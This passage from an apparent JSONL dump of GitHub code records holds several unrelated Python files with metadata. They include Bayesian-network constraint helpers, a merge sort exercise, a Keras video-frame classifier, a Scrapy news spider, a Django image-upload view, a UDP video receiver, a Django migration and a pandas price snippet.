len(states_arr)\n \n configs = -999*np.ones(num_nodes)\n config = complete_config(configs, states_arr)\n config_p = arrange_config_v2(config, dag, states_arr)\n \n config = one_hot_config(config, states_arr)\n \n return config, config_p\n\ndef one_hot_config(config, states_arr):\n num_config, num_nodes = np.shape(config)\n states_cum = np.cumsum(states_arr)\n states_cum = np.insert(states_cum, 0, 0)\n num_states = np.sum(states_arr)\n num_states = num_states.astype(int)\n \n onehot_config = np.zeros([num_config, num_states])\n for i in range(num_config):\n for j in range(num_nodes):\n sidx = states_cum[j]\n ss = config[i,j]\n onehot_config[i, sidx.astype(int) + ss.astype(int)] = 1\n \n return onehot_config\n\n\ndef read_condition(constraint):\n num_condition = len(constraint)\n idx = []\n config = []\n for i in range(num_condition):\n idx.append(constraint[i][0])\n config.append(constraint[i][1])\n \n return idx, config\n\n\ndef sparse_constraint(Constraint, states_arr):\n num_constraints = len(Constraint)\n num_nodes = len(states_arr)\n \n configs = -999*np.ones(num_nodes)\n config_all = complete_config(configs, states_arr)\n num_config = config_all.shape[0]\n \n strict_idx = 0\n strict_const = []\n inequal_idx = 0\n inequal_const = []\n equal_idx = 0\n equal_const = []\n\n \n for i in np.arange(num_constraints):\n constraint = Constraint[i]\n # get target set and condition set\n target_idx, target_config = read_condition(constraint[0])\n condition_idx, condition_config = read_condition(constraint[1])\n \n # numerator\n mask_N = np.zeros([num_config, 1])\n mask_N[np.where((config_all[:,target_idx] == target_config) & \\\n (config_all[:,condition_idx] == condition_config))[0]] = 1\n\n # denominator\n mask_D = np.zeros([num_config, 1])\n mask_D[np.where(config_all[:, condition_idx] == condition_config)] = 1\n \n if constraint[2] == 'bigger':\n if inequal_idx == 0:\n inequal_numer = -mask_N\n inequal_denom = mask_D\n else:\n inequal_numer = np.concatenate((inequal_numer, -mask_N), axis = 1)\n inequal_denom = np.concatenate((inequal_denom, mask_D), axis = 1) \n inequal_const.append(-constraint[3])\n inequal_idx = inequal_idx + 1\n \n elif constraint[2] 
== 'smaller':\n if inequal_idx == 0:\n inequal_numer = mask_N\n inequal_denom = mask_D\n else:\n inequal_numer = np.concatenate((inequal_numer, mask_N), axis = 1)\n inequal_denom = np.concatenate((inequal_denom, mask_D), axis = 1) \n inequal_const.append(constraint[3])\n inequal_idx = inequal_idx + 1\n \n elif constraint[2] == 'strict bigger':\n if strict_idx == 0:\n strict_numer = -mask_N\n strict_denom = mask_D\n else:\n strict_numer = np.concatenate((strict_numer, -mask_N), axis = 1)\n strict_denom = np.concatenate((strict_denom, mask_D), axis = 1) \n strict_const.append(-constraint[3])\n strict_idx = strict_idx + 1\n \n elif constraint[2] == 'strict smaller':\n if strict_idx == 0:\n strict_numer = mask_N\n strict_denom = mask_D\n else:\n strict_numer = np.concatenate((strict_numer, mask_N), axis = 1)\n strict_denom = np.concatenate((strict_denom, mask_D), axis = 1) \n strict_const.append(constraint[3]) \n strict_idx = strict_idx + 1\n \n elif constraint[2] == 'equal':\n if equal_idx == 0:\n equal_numer = mask_N\n equal_denom = mask_D\n else:\n equal_numer = np.concatenate((equal_numer, mask_N), axis = 1)\n equal_denom = np.concatenate((equal_denom, mask_D), axis = 1) \n equal_const.append(constraint[3]) \n equal_idx = equal_idx + 1\n \n return strict_numer, strict_denom, strict_const, inequal_numer, inequal_denom, inequal_const,\\\n equal_numer, equal_denom, equal_const\n\n\n\ndef sparse_constraint_v2(Constraint, states_arr):\n num_constraints = len(Constraint)\n num_nodes = len(states_arr)\n \n configs = -999*np.ones(num_nodes)\n config_all = complete_config(configs, states_arr)\n num_config = config_all.shape[0]\n \n strict2_idx = 0\n strict3_idx = 0\n\n \n for i in np.arange(num_constraints):\n constraint = Constraint[i]\n # get target set and condition set\n target_idx, target_config = read_condition(constraint[0])\n condition_idx, condition_config = read_condition(constraint[1])\n\n # numerator\n mask_N = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n temp1 = target_idx + condition_idx\n temp2 = target_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_N[idx] = 1\n else:\n idx = (config_all[:,target_idx] == target_config).all(axis=1).nonzero()[0]\n mask_N[idx] = 1\n \n # denominator\n mask_D = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n idx = (config_all[:, condition_idx] == condition_config).all(axis=1).nonzero()[0]\n mask_D[idx] = 1\n \n \n if constraint[2] == 'strict bigger':\n \n const_idx, const_config = read_condition(constraint[3])\n # numerator for constraint\n mask_cN = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n temp1 = const_idx + condition_idx\n temp2 = const_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n else:\n idx = (config_all[:,const_idx] == const_config).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n \n \n if strict2_idx == 0:\n strict_numer2 = -mask_N\n strict_denom2 = mask_D\n strict_const_numer2 = -mask_cN\n else:\n strict_numer2 = np.concatenate((strict_numer2, -mask_N), axis = 1)\n strict_denom2 = np.concatenate((strict_denom2, mask_D), axis = 1) \n strict_const_numer2 = np.concatenate((strict_const_numer2, -mask_cN), axis = 1)\n strict2_idx = strict2_idx + 1\n \n elif constraint[2] == 'strict smaller':\n \n const_idx, const_config = read_condition(constraint[3])\n # numerator for constraint\n mask_cN = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n temp1 = const_idx + condition_idx\n temp2 = 
const_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n else:\n idx = (config_all[:,const_idx] == const_config).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n \n if strict2_idx == 0:\n strict_numer2 = mask_N\n strict_denom2 = mask_D\n strict_const_numer2 = mask_cN\n else:\n strict_numer2 = np.concatenate((strict_numer2, mask_N), axis = 1)\n strict_denom2 = np.concatenate((strict_denom2, mask_D), axis = 1) \n strict_const_numer2 = np.concatenate((strict_const_numer2, mask_cN), axis = 1)\n strict2_idx = strict2_idx + 1\n \n elif constraint[2] == 'strict bigger-product':\n \n const1_idx, const1_config = read_condition([constraint[3][0]])\n const2_idx, const2_config = read_condition([constraint[3][1]])\n # numerator for constraint\n mask_cN1 = np.zeros([num_config, 1])\n temp1 = const1_idx + condition_idx\n temp2 = const1_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN1[idx] = 1\n \n mask_cN2 = np.zeros([num_config, 1])\n temp1 = const2_idx + condition_idx\n temp2 = const2_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN2[idx] = 1\n \n if strict3_idx == 0:\n strict_numer3 = -mask_N\n strict_denom3 = mask_D\n strict_const_numer31 = -mask_cN1\n strict_const_numer32 = mask_cN2\n else:\n strict_numer3 = np.concatenate((strict_numer3, -mask_N), axis = 1)\n strict_denom3 = np.concatenate((strict_denom3, mask_D), axis = 1) \n strict_const_numer31 = np.concatenate((strict_const_numer31, -mask_cN1), axis = 1)\n strict_const_numer32 = np.concatenate((strict_const_numer32, mask_cN2), axis = 1)\n strict3_idx = strict3_idx + 1\n \n elif constraint[2] == 'strict smaller-product':\n \n const1_idx, const1_config = read_condition([constraint[3][0]])\n const2_idx, const2_config = read_condition([constraint[3][1]])\n # numerator for constraint\n mask_cN1 = np.zeros([num_config, 1])\n temp1 = const1_idx + condition_idx\n temp2 = const1_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN1[idx] = 1\n \n mask_cN2 = np.zeros([num_config, 1])\n temp1 = const2_idx + condition_idx\n temp2 = const2_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN2[idx] = 1\n \n if strict3_idx == 0:\n strict_numer3 = mask_N\n strict_denom3 = mask_D\n strict_const_numer31 = mask_cN1\n strict_const_numer32 = mask_cN2\n else:\n strict_numer3 = np.concatenate((strict_numer3, mask_N), axis = 1)\n strict_denom3 = np.concatenate((strict_denom3, mask_D), axis = 1) \n strict_const_numer31 = np.concatenate((strict_const_numer31, mask_cN1), axis = 1)\n strict_const_numer32 = np.concatenate((strict_const_numer32, mask_cN2), axis = 1)\n strict3_idx = strict3_idx + 1\n \n return strict_numer2, strict_denom2, strict_const_numer2, \\\n strict_numer3, strict_denom3, strict_const_numer31, strict_const_numer32\\\n \n \n\ndef update_slack(value, init):\n num_variable = len(init)\n update_value = value.copy()\n for i in np.arange(num_variable):\n func = lambda x: (value[i]+np.math.exp(x))*np.math.exp(x)/((value[i]+np.math.exp(x))**2+1) - x \n update_value[i] = fsolve(func, init[i])\n \n return update_value\n\n\n\ndef check_satisfaction(strict_p, inequal_p, equal_p, strict_const_, inequal_const_, equal_const_):\n percent_strict = sum((strict_p-strict_const_)<0)/len(strict_p)\n percent_inequal = sum((inequal_p-inequal_const_)<0)/len(inequal_p)\n percent_equal = 
sum(abs(equal_p-equal_const_)<0.1)/len(equal_p)\n percent_total = (sum((strict_p-strict_const_)<0)+sum((inequal_p-inequal_const_)<0)+\\\n sum(abs(equal_p-equal_const_)<0.1))/(len(strict_p)+len(inequal_p)+len(equal_p))\n print('total = %f, strict = %f, inequal = %f, equal=%f'%(percent_total, percent_strict, percent_inequal, percent_equal))\n \n'''tf'''\n\ndef WeightsToAdjacency(weights_r, states_cum):\n \n weights_pos = tf.nn.relu(weights_r)\n weights_neg = tf.nn.relu(-weights_r)\n weights = weights_pos + weights_neg\n# weights = tf.math.abs(weights_r)\n weights = tf.math.square(weights_r)\n \n row1 = tf.math.reduce_sum(weights_r[states_cum[0]:states_cum[1], :], axis=0, keepdims=True) \n row2 = tf.math.reduce_sum(weights_r[states_cum[1]:states_cum[2], :], axis=0, keepdims=True)\n row3 = tf.math.reduce_sum(weights_r[states_cum[2]:states_cum[3], :], axis=0, keepdims=True)\n row4 = tf.math.reduce_sum(weights_r[states_cum[3]:states_cum[4], :], axis=0, keepdims=True)\n row5 = tf.math.reduce_sum(weights_r[states_cum[4]:states_cum[5], :], axis=0, keepdims=True)\n row6 = tf.math.reduce_sum(weights_r[states_cum[5]:states_cum[6], :], axis=0, keepdims=True)\n row7 = tf.math.reduce_sum(weights_r[states_cum[6]:states_cum[7], :], axis=0, keepdims=True)\n row8 = tf.math.reduce_sum(weights_r[states_cum[7]:states_cum[8], :], axis=0, keepdims=True)\n row9 = tf.math.reduce_sum(weights_r[states_cum[8]:states_cum[9], :], axis=0, keepdims=True)\n \n adjacency = tf.concat([row1, row2, row3, row4, row5, row6, row7, row8, row9], axis=0) #[num_states, num_config]\n \n return adjacency\n\n\ndef DAGconstraint(adjacency):\n '''\n (Zheng et al 2019)\n '''\n num_nodes = tf.shape(adjacency)[0]\n num_nodes = tf.dtypes.cast(num_nodes, tf.float32)\n E = tf.linalg.expm(adjacency*adjacency)\n h = tf.linalg.trace(E) - num_nodes \n\n return h\n\n\ndef SPARSEconstraint_l1(adjacency):\n adj_ = adjacency\n \n return tf.math.reduce_sum(adj_)\n\ndef joint_marg_prob(states_cum, weights, bias, config, mask, parent_config): \n num_states = tf.shape(parent_config)[0]\n num_config = tf.shape(config)[1]\n \n weight_reshape = tf.tile(tf.expand_dims(weights, 2), [num_states, 1, num_config])\n bias_reshape = tf.tile(bias, [1, num_config])\n \n val = tf.reduce_sum(tf.math.multiply(parent_config, weight_reshape), 1) + tf.math.multiply(bias_reshape, mask)\n \n dist1 = tf.nn.softmax(val[states_cum[0]:states_cum[1],:], axis=0)\n dist2 = tf.nn.softmax(val[states_cum[1]:states_cum[2],:], axis=0)\n dist3 = tf.nn.softmax(val[states_cum[2]:states_cum[3],:], axis=0)\n dist4 = tf.nn.softmax(val[states_cum[3]:states_cum[4],:], axis=0)\n dist5 = tf.nn.softmax(val[states_cum[4]:states_cum[5],:], axis=0)\n dist6 = tf.nn.softmax(val[states_cum[5]:states_cum[6],:], axis=0)\n dist7 = tf.nn.softmax(val[states_cum[6]:states_cum[7],:], axis=0)\n dist8 = tf.nn.softmax(val[states_cum[7]:states_cum[8],:], axis=0)\n dist9 = tf.nn.softmax(val[states_cum[8]:states_cum[9],:], axis=0) \n\n distribution = tf.concat([dist1, dist2, dist3, dist4, dist5, dist6, dist7, dist8, dist9], axis=0) #[num_states, num_config]\n\n prob_arr = tf.math.pow(distribution, config)\n prob_arr2 = tf.math.reduce_prod(prob_arr, 0) # joint probability for each configuration\n prob = tf.math.reduce_sum(distribution) # by lisiting all joint configurations, prob should always be 1 if DAG\n \n return prob, 
prob_arr2\n","repo_name":"zijunjkl/NeurIPS2020","sub_path":"BNwithConstraints/helper_function_new.py","file_name":"helper_function_new.py","file_ext":"py","file_size_in_byte":20004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39533082853","text":"def merge_sort(items):\n \n return divide(items, glue = merge)\n\n \ndef divide(items, glue):\n\n # conquer step - recursive base case\n if len(items) < 2:\n return items\n\n mid = len(items) // 2\n\n left = divide(items[0:mid], glue)\n\n right = divide(items[mid:], glue)\n\n # \"glue\" it all back together\n return glue(left, right)\n\n\ndef merge(left, right):\n\n result = []\n\n while left or right:\n\n if not left:\n result += right\n break\n \n if not right:\n result += left\n break\n\n # To ponder: what, if any, are the big O implications\n # of removing from front of collection?\n # Are there other data structures that may be more efficient?\n if left[0] < right[0]:\n result.append(left.pop(0))\n else:\n result.append(right.pop(0))\n\n return result\n\n \n\n","repo_name":"CodeCrew-CodeSchool/Alumni-Challenges","sub_path":"data_structures_and_algorithms/Code_401/class-27/solutions/python/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3036109825","text":"def ApplyModelsToVideo(PathSubFolderToAnalyze):\r\n import os\r\n ################################\r\n # Lister les modèles disponibles\r\n ListOfModels = []\r\n # Parcours des fichiers et dossiers dans le chemin spécifié\r\n for element in os.listdir(PathSubFolderToAnalyze):\r\n chemin_absolu = os.path.join(PathSubFolderToAnalyze, element)\r\n # Vérification si l'élément est un fichier se terminant par l'extension '.h5'\r\n if os.path.isfile(chemin_absolu) and element.lower().endswith('.h5'):\r\n ListOfModels.append(chemin_absolu)\r\n # Affichage des fichiers trouvés\r\n for model in ListOfModels:\r\n print(model)\r\n print(ListOfModels)\r\n ###########################\r\n # Lister les fichiers vidéo\r\n ListOfVideos = []\r\n # Parcours des fichiers et dossiers dans le chemin spécifié\r\n for element in os.listdir(PathSubFolderToAnalyze):\r\n chemin_absolu = os.path.join(PathSubFolderToAnalyze, element)\r\n # Vérification si l'élément est un fichier vidéo se terminant par les extensions '.mts' ou '.mp4'\r\n if os.path.isfile(chemin_absolu) and (element.lower().endswith('.mts') or element.lower().endswith('.mp4')):\r\n ListOfVideos.append(chemin_absolu)\r\n for element in ListOfVideos:\r\n if element.lower().endswith('.body.mp4'):\r\n ListOfVideos = [element]\r\n print(ListOfVideos)\r\n ##################################################################\r\n # Pour chaque modèle, appliquer pour chaque vidéo, et pour chaque image de la vidéo, le modèle\r\n import cv2\r\n from tensorflow import keras\r\n from tensorflow.keras.preprocessing import image\r\n from tensorflow.keras.optimizers import RMSprop\r\n import tensorflow as tf\r\n import numpy as np\r\n #\r\n # Vérification de la disponibilité du GPU pour TensorFlow\r\n from tensorflow.python.client import device_lib# Vérifier la disponibilité des GPU\r\n gpu_devices = [device.name for device in device_lib.list_local_devices() if device.device_type == \"GPU\"]\r\n print(gpu_devices)\r\n if not gpu_devices:\r\n print(\"Aucun GPU disponible. 
Veuillez vous assurer que CUDA et les pilotes NVIDIA sont correctement installés.\")\r\n        XPUs = [\"/CPU:0\"]\r\n    else:\r\n        XPUs = [\"/GPU:0\"]\r\n    for XPU in XPUs:\r\n        with tf.device(XPU):\r\n            #\r\n            for Model in ListOfModels:\r\n                model = keras.models.load_model(Model)# load the model\r\n                input_shape = model.input_shape[1:3]\r\n                for PathVideo in ListOfVideos:\r\n                    # Write the results to a .csv\r\n                    import csv\r\n                    ResultPath = os.path.join(PathSubFolderToAnalyze, str(os.path.basename(Model)) + 'Ethogram.csv')# path of the CSV file\r\n                    # Open the CSV file in append or write mode\r\n                    with open(ResultPath, 'a', newline='') as file:\r\n                        writer = csv.writer(file, delimiter=';')# write rows into the CSV file\r\n                        #############################\r\n                        # Select the video\r\n                        video = cv2.VideoCapture(PathVideo)\r\n                        # Check that the video opened correctly\r\n                        if not video.isOpened():\r\n                            print(\"Impossible d'ouvrir la vidéo.\")\r\n                            exit()\r\n                        # Loop over every frame of the video\r\n                        frame_count = 1\r\n                        while True:\r\n                            # Read the next frame\r\n                            ret, frame = video.read()\r\n                            # Check whether the frame was read successfully\r\n                            if not ret:\r\n                                break\r\n                            ##########################################\r\n                            # Apply the model to each frame\r\n                            threshold=0.5 # detection sensitivity threshold | threshold = 0.5 | lowering it makes detection more tolerant\r\n                            #cote, cote2, canaux = frame.shape\r\n                            #\r\n                            img = np.array(frame, dtype=np.float32) # convert the OpenCV image to a numpy array\r\n                            img = cv2.resize(img, input_shape)\r\n                            img = np.expand_dims(img, axis=0) # add a batch dimension to match what the model expects\r\n                            val=model.predict(img)\r\n                            if val < threshold:\r\n                                writer.writerow([str(frame_count), 'POS'])# write the result row\r\n                            else:\r\n                                writer.writerow([str(frame_count), 'NEG'])# write the result row\r\n                            # Increment the frame counter\r\n                            frame_count += 1\r\n                            # Exit the loop if the 'q' key is pressed\r\n                            if cv2.waitKey(1) & 0xFF == ord('q'):\r\n                                break\r\n                        # Release resources\r\n                        video.release()\r\n                        cv2.destroyAllWindows()\r\n                    ################################\r\n                    # Plot the resulting ethogram\r\n                    import matplotlib.pyplot as plt\r\n                    # Read the CSV file and extract the column-1 values and column-2 labels\r\n                    valeurs_colonne1 = []\r\n                    etiquettes_colonne2 = []\r\n                    with open(ResultPath, 'r') as file:\r\n                        reader = csv.reader(file, delimiter=';')\r\n                        for row in reader:\r\n                            valeurs_colonne1.append(int(row[0]))\r\n                            etiquettes_colonne2.append(row[1])\r\n                    # Build a matrix representing the heatmap\r\n                    heatmap = np.zeros((1, max(valeurs_colonne1)))\r\n                    for valeur, etiquette in zip(valeurs_colonne1, etiquettes_colonne2):\r\n                        if etiquette == 'POS':\r\n                            heatmap[0, valeur-1] = 1\r\n                    # Draw the heatmap\r\n                    plt.imshow(heatmap, cmap='Greens_r', aspect='auto')\r\n                    # Customize the plot\r\n                    plt.xlabel('Frame')\r\n                    plt.title(str(Model))\r\n                    plt.xticks(range(len(valeurs_colonne1)), valeurs_colonne1, rotation='vertical')\r\n                    plt.yticks([])\r\n                    # Show the plot\r\n                    plt.show()","repo_name":"beesixtwelvian/RodentPainTracker","sub_path":"RodentPainTracker/ApplyModelsToVideo/ApplyModelsToVideo.py","file_name":"ApplyModelsToVideo.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39553594042","text":"import scrapy\n\nfrom scrapy.loader import ItemLoader\n\nfrom 
..items import OnecommunitybankItem\nfrom itemloaders.processors import TakeFirst\n\nbase = 'https://www.onecommunity.bank/category/news/page/{}/'\n\nclass OnecommunitybankSpider(scrapy.Spider):\n\tname = 'onecommunitybank'\n\tpage = 1\n\tstart_urls = [base.format(page)]\n\n\tdef parse(self, response):\n\t\tpost_links = response.xpath('//a[@class=\"btn\"]/@href').getall()\n\t\tyield from response.follow_all(post_links, self.parse_post)\n\n\t\tif post_links:\n\t\t\tself.page += 1\n\t\t\tyield response.follow(base.format(self.page), self.parse)\n\n\tdef parse_post(self, response):\n\t\ttitle = response.xpath('//h1/text()').get()\n\t\tdescription = response.xpath('//div[@class=\"post-body tight-text-flex-container\"]//text()[normalize-space()]').getall()\n\t\tdescription = [p.strip() for p in description]\n\t\tdescription = ' '.join(description).strip()\n\t\tdate = response.xpath('//div[@class=\"post-date\"]/text()').get()\n\n\t\titem = ItemLoader(item=OnecommunitybankItem(), response=response)\n\t\titem.default_output_processor = TakeFirst()\n\t\titem.add_value('title', title)\n\t\titem.add_value('description', description)\n\t\titem.add_value('date', date)\n\n\t\treturn item.load_item()\n","repo_name":"hristo-grudev/onecommunitybank","sub_path":"onecommunitybank/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24411237188","text":"import base64\nimport json\nimport os\nimport uuid\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .tasks import process_image\n\n\n@csrf_exempt\ndef exec_script(request):\n    if request.method != 'POST':\n        # only POST carries a task result, so reject anything else up front\n        return JsonResponse({'error': 'POST required'}, status=405)\n    body_json = json.loads(request.body)\n    clothing = body_json['clothing']\n    img_data = body_json['image']  # base64 raw data (without prefix data:image/...)\n    wd = os.getcwd() + '/keypoints/code'\n\n    # Generate unique uuid\n    img_id = uuid.uuid4()\n\n    with open(wd + '/tmp'+str(img_id)+'.jpg', 'wb') as f:\n        f.write(base64.b64decode(img_data))  # Valid only for jpg data\n\n    # Run AI script\n    res = process_image.delay('/tmp'+str(img_id)+'.jpg', clothing)\n\n    return JsonResponse({'task_id': res.id})\n\ndef task_status(request, task_id):\n    res = process_image.AsyncResult(task_id)\n    return JsonResponse({'status': res.status, 'result': res.result})\n","repo_name":"2022-2023-INFO5-FitSize/FitSize---Backend","sub_path":"keypoints/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13090538872","text":"import socket\nimport numpy as np\nimport cv2 as cv\n\nrecevier = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n# prepare the UDP socket\nrecevier.bind(('192.168.16.24', 7778))\n# bind to the listening address\n\n# 480 * 640 * 3 / 20 = 46080\nperlength = int( (480 * 640 * 3) / 20) # packet size\nreallength = perlength + 1\n\narray = [b''] * 20  # one pre-allocated slot per chunk index; indexing into an empty list raises IndexError\nwhile True:\n    message, address= recevier.recvfrom(reallength)\n    # receive one datagram: a 1-byte chunk index followed by the chunk payload\n\n    chunk = message[1:reallength]  # payload after the 1-byte chunk index\n    num_array = b''\n\n    array[message[0]] = chunk\n\n    if message[0] == 19:\n        for i in range(20):\n            num_array += array[i]\n        frame = np.frombuffer(num_array, dtype=np.uint8)  # build a uint8 array from the raw bytes\n        frame = frame.reshape(480,640,3)\n        cv.imshow('video receiver',frame)\n        cv.waitKey(1)  # imshow only refreshes its window when waitKey runs\n\n        
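# Packet arithmetic, for reference: one 480x640 BGR frame is 480*640*3 = 921600 bytes,\n        # i.e. 20 chunks of 46080 payload bytes each; with the 1-byte chunk index in front,\n        # each datagram is the 46081 bytes requested from recvfrom above.\n        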
pass","repo_name":"jyhh1992/test_opencv","sub_path":"video_receiver.py","file_name":"video_receiver.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10064439512","text":"from __future__ import unicode_literals\n\nimport django.contrib.postgres.fields\nimport django.contrib.postgres.fields.jsonb\nimport django.contrib.postgres.fields.ranges\nimport django.core.serializers.json\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\nimport model_utils.fields\nimport panels.models.entity\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"panels\", \"0036_auto_20180213_1322\")]\n\n operations = [\n migrations.CreateModel(\n name=\"STR\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\n \"created\",\n model_utils.fields.AutoCreatedField(\n default=django.utils.timezone.now,\n editable=False,\n verbose_name=\"created\",\n ),\n ),\n (\n \"modified\",\n model_utils.fields.AutoLastModifiedField(\n default=django.utils.timezone.now,\n editable=False,\n verbose_name=\"modified\",\n ),\n ),\n (\"name\", models.CharField(max_length=128)),\n (\n \"position\",\n models.CharField(help_text=\"Chr:Start Position\", max_length=32),\n ),\n (\n \"normal_range\",\n django.contrib.postgres.fields.ranges.IntegerRangeField(\n blank=True, null=True\n ),\n ),\n (\n \"prepathogenic_range\",\n django.contrib.postgres.fields.ranges.IntegerRangeField(\n blank=True, null=True\n ),\n ),\n (\n \"pathogenic_range\",\n django.contrib.postgres.fields.ranges.IntegerRangeField(),\n ),\n (\n \"gene\",\n django.contrib.postgres.fields.jsonb.JSONField(\n encoder=django.core.serializers.json.DjangoJSONEncoder\n ),\n ),\n (\n \"moi\",\n models.CharField(\n choices=[\n (\"\", \"Provide a mode of inheritance\"),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, NOT imprinted\",\n \"MONOALLELIC, autosomal or pseudoautosomal, NOT imprinted\",\n ),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, maternally imprinted (paternal allele expressed)\",\n \"MONOALLELIC, autosomal or pseudoautosomal, maternally imprinted (paternal allele expressed)\",\n ),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, paternally imprinted (maternal allele expressed)\",\n \"MONOALLELIC, autosomal or pseudoautosomal, paternally imprinted (maternal allele expressed)\",\n ),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, imprinted status unknown\",\n \"MONOALLELIC, autosomal or pseudoautosomal, imprinted status unknown\",\n ),\n (\n \"BIALLELIC, autosomal or pseudoautosomal\",\n \"BIALLELIC, autosomal or pseudoautosomal\",\n ),\n (\n \"BOTH monoallelic and biallelic, autosomal or pseudoautosomal\",\n \"BOTH monoallelic and biallelic, autosomal or pseudoautosomal\",\n ),\n (\n \"BOTH monoallelic and biallelic (but BIALLELIC mutations cause a more SEVERE disease form), autosomal or pseudoautosomal\",\n \"BOTH monoallelic and biallelic (but BIALLELIC mutations cause a more SEVERE disease form), autosomal or pseudoautosomal\",\n ),\n (\n \"X-LINKED: hemizygous mutation in males, biallelic mutations in females\",\n \"X-LINKED: hemizygous mutation in males, biallelic mutations in females\",\n ),\n (\n \"X-LINKED: hemizygous mutation in males, monoallelic mutations in females may cause disease (may be less severe, later onset than males)\",\n \"X-LINKED: hemizygous mutation in males, monoallelic 
mutations in females may cause disease (may be less severe, later onset than males)\",\n ),\n (\"MITOCHONDRIAL\", \"MITOCHONDRIAL\"),\n (\"Unknown\", \"Unknown\"),\n (\n \"Other - please specifiy in evaluation comments\",\n \"Other - please specifiy in evaluation comments\",\n ),\n ],\n max_length=255,\n verbose_name=\"Mode of inheritance\",\n ),\n ),\n (\n \"penetrance\",\n models.CharField(\n blank=True,\n choices=[\n (\"unknown\", \"unknown\"),\n (\"Complete\", \"Complete\"),\n (\"Incomplete\", \"Incomplete\"),\n ],\n max_length=255,\n null=True,\n ),\n ),\n (\n \"publications\",\n django.contrib.postgres.fields.ArrayField(\n base_field=models.TextField(), blank=True, null=True, size=None\n ),\n ),\n (\n \"phenotypes\",\n django.contrib.postgres.fields.ArrayField(\n base_field=models.TextField(), blank=True, null=True, size=None\n ),\n ),\n (\"flagged\", models.BooleanField(default=False)),\n (\"ready\", models.BooleanField(default=False)),\n (\n \"mode_of_pathogenicity\",\n models.CharField(\n blank=True,\n choices=[\n (\"\", \"Provide exceptions to loss-of-function\"),\n (\n \"Loss-of-function variants (as defined in pop up message) DO NOT cause this phenotype - please provide details in the comments\",\n \"Loss-of-function variants (as defined in pop up message) DO NOT cause this phenotype - please provide details in the comments\",\n ),\n (\n \"Other - please provide details in the comments\",\n \"Other - please provide details in the comments\",\n ),\n ],\n max_length=255,\n null=True,\n ),\n ),\n (\"saved_gel_status\", models.IntegerField(db_index=True, null=True)),\n (\"comments\", models.ManyToManyField(to=\"panels.Comment\")),\n (\n \"evaluation\",\n models.ManyToManyField(db_index=True, to=\"panels.Evaluation\"),\n ),\n (\"evidence\", models.ManyToManyField(to=\"panels.Evidence\")),\n (\n \"gene_core\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to=\"panels.Gene\"\n ),\n ),\n (\n \"panel\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n to=\"panels.GenePanelSnapshot\",\n ),\n ),\n (\"tags\", models.ManyToManyField(to=\"panels.Tag\")),\n (\"track\", models.ManyToManyField(to=\"panels.TrackRecord\")),\n ],\n options={\"get_latest_by\": \"created\", \"ordering\": [\"-saved_gel_status\"]},\n bases=(panels.models.entity.AbstractEntity, models.Model),\n ),\n migrations.AddIndex(\n model_name=\"str\",\n index=models.Index(\n fields=[\"panel_id\"], name=\"panels_str_panel_i_68b388_idx\"\n ),\n ),\n migrations.AddIndex(\n model_name=\"str\",\n index=models.Index(\n fields=[\"gene_core_id\"], name=\"panels_str_gene_co_bad503_idx\"\n ),\n ),\n ]\n","repo_name":"genomicsengland/panelapp","sub_path":"panelapp/panels/migrations/0037_auto_20180213_1323.py","file_name":"0037_auto_20180213_1323.py","file_ext":"py","file_size_in_byte":9510,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"8101247928","text":"import pandas as pd\n\nimport acquisition1 as aq\n\npreciotungsteno=aq.tungsten_timeseries\npreciotungsteno.drop(['success','timeseries', 'start_date','end_date', 'base'], axis=1, inplace=True)\npreciotungsteno.index.name='Date'\npreciotungsteno=preciotungsteno.rates.apply(pd.Series)\npreciotungsteno.drop('USD', axis=1, inplace=True)\npreciotungsteno['Tungsten Price']= (1/preciotungsteno['TUNGSTEN'])*32151\npreciotungsteno.drop('TUNGSTEN',axis=1, 
